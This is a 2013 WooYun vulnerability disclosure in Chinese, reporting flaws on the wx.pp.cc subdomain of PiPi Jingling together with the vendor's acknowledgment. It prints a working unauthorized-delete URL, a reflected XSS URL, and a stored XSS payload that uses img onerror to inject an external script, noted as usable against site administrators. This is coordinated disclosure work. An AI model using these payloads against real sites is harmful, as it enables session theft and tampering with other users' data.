当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-027139

漏洞标题:皮皮精灵某分站一些小漏洞打包

相关厂商:皮皮精灵

漏洞作者: 齐迹

提交时间:2013-06-28 20:52

修复时间:2013-08-12 20:53

公开时间:2013-08-12 20:53

漏洞类型:未授权访问/权限绕过

危害等级:低

自评Rank:5

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-06-28: 细节已通知厂商并且等待厂商处理中
2013-06-29: 厂商已经确认,细节仅向厂商公开
2013-07-09: 细节向核心白帽子及相关领域专家公开
2013-07-19: 细节向普通白帽子公开
2013-07-29: 细节向实习白帽子公开
2013-08-12: 细节向公众公开

简要描述:

未授权删除其他用户数据,多处存储反射xss,越权查看其他用户内容。。。

详细说明:

问题站
http://wx.pp.cc
1越权删除其他用户举报
http://wx.pp.cc/wb_ajax/update_action?act=del&id_str=任意ID

wx-yq.jpg


2查看任意文章(不知道是不是本来就公开的,反正未审核的也可以查看)
http://wx.pp.cc/wb_ajax/preview/任意文章ID/1372420599?t=1372403376&preview=1
3 反射xss
http://wx.pp.cc/wb_advs/income?date=&keyword=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
4存储xss2枚
4-1 http://wx.pp.cc/wb_lodge/index
标题,内容,图片url均为过滤可以xss代码打管理

wx-xss-1.jpg


4-2 http://wx.pp.cc/wb_u/write
写文章编辑器过滤不到位
在源码模式下可以使用
<img src=1 onerror="with(document)body.appendChild(createElement('script')).src='xss'">
形成xss攻击 也可以打管理哦!

wx-xss-2.jpg

漏洞证明:

上面已证明,都是小洞 打包给你们了!

修复方案:

程序员都通宵加班修bug把!

版权声明:转载请注明来源 齐迹@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2013-06-29 10:02

厂商回复:

感谢齐迹的发现,说实话,皮皮微信的负责人之前已经被鞭过一次了。
img 标签上通过 onerror 执行 script 这个确实是我们没想到的,非常感谢。

最新状态:

暂无